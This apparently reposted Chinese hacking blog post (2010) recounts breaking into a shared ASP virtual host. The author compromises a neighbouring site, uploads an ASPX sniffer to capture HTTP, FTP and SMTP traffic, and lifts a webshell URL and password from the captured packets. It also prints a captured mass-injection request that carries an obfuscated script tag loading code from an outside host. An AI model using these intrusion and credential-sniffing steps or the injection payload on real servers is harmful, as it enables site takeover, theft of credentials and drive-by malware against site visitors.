WinSock嗅探虚拟主机拿站取webshell

来源：本站转载 作者：佚名时间：2010-08-08TAG： 我要投稿

感觉这些够无聊的，没点新意不说，好像还觉得有点白痴 - - 所以文章我本来就没打算写。不过既然有人帮我写了，我就发出来吧。其实我拿到虚拟主机管理员密码的步骤是。。。。。。
PS:这工具过几天在本文里放出呵。因为最近考试，博客七月前不更新了，七月放假了我在回来完善博客程序
过程是我搞的，但是当时我没截图，所以小酷同学整理出来的这个文章时间就有点对不上，不过确实是这么个步骤
首先是嗅探工具，asp的虚拟一般都支持aspx（少数不支持的忽略哈），那么用C#调用winsock嗅探下80端口、顺便连ftp和SMTP端口一起监听了吧。
第一步，随便旁注拿下asp虚拟主机上的一个网站，上传aspx的工具（工具我会随后发上来的）如图：

 

这个虚拟主机还算不错，才三分钟，就Packets: 260这么多包了
一个通宵抓包，好了，该分析日志了。
日志下载下来，因为虚拟主机，监听的是整个服务器，信息量太大，只能有选择的分析，搜索admin、pass、user、login等等有选择的看包。
从抓包中发现，很多人在暴力猜解ftp密码。。。晕，这是何苦呢
搜索admin这一关键词时有这么一个部分引起了我的注意，如图：

目录是admin下的文件，而且还有Cookie。。。很明显。呵呵
再看往下：
POST: /Admin/sent.asp HTTP/1.1

Via: 1.0 PROXY

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

Referer: http://www.xxx.com/Admin/sent.asp

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Host: www.xxx.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Accept-Language: zh-cn

UA-CPU: x86

Pragma: no-cache

Connection: Keep-Alive

Content-Length: 13

pass=buqiuren

慢慢来看，无关的跳过了哈

POST: /Admin/sent.asp

发送指令到admin目录的sent.asp

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

这个不用解释了吧，用session，session似乎不能像Cookie那样欺骗，能我也不会

Referer: http://www.xxx.com/Admin/sent.asp

完整的url估计就是这个不错了，打开看看。居然是webshell
这下就更省事了

 好了，继续往下看：

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

反正不是我机器上的
下面的越看越无聊，直接跳到最后：

pass=buqiuren

输入密码：buqiuren即可登录

 

下面就是批量清马，清理找webshell了
PS：做人要积德，挂马盗号这样的无德无良的事情最好不要干，修复漏洞，留张条就行了。罪过啊罪过
look，挂马的信息也抓出来了。。。。好无聊

POST /Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script> HTTP/1.1

Via: 1.0 PROXY

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

Referer: http://www.xxx.com/Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script>

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Host: www.xxx.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Accept-Language: zh-cn

UA-CPU: x86

Pragma: no-cache

Connection: Keep-Alive

Content-Length: 153